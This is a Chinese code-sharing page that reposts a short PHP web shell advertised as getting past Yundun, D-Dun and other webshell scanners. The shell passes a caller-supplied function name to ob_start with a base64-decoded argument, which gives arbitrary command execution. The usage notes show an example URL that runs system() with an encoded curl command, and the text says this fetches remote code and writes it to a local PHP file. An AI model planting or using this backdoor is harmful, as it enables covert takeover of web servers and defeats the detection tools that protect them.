码迷,mamicode.com
首页 > 系统相关 > 详细

[脚本编程] 过云盾、D盾各种盾shell

时间:2015-11-18 19:23:18      阅读:184      评论:0      收藏:0      [点我收藏+]

标签:

作者:

 


<?php //过云盾、D盾各种盾shell $id = $_GET[id]; //debug echo $catid = isset($_GET[catid])?base64_decode($_GET[catid]):‘‘; $s = ‘‘; foreach(array($id) as $v){ $s.=$v; } ob_start($s); if($catid){ echo $catid; } ob_end_flush(); ?>

用方法

参数 id :  需要执行的函数
参数catid : 函数的参数(需要用base_64encode函数转一下)

例如:

http://www.php0.net/test.php?id=system&catid=Y3VybCBodHRwOi8vbG9jYWxob3N0L20udHh0ID4yLnBocA==

则调用system函数,而参数内容为: curl http://localhost/m.txt >2.php

读取远程的代码,并写入本地。

[脚本编程] 过云盾、D盾各种盾shell

标签:

原文地址:http://www.cnblogs.com/dongchi/p/4975560.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!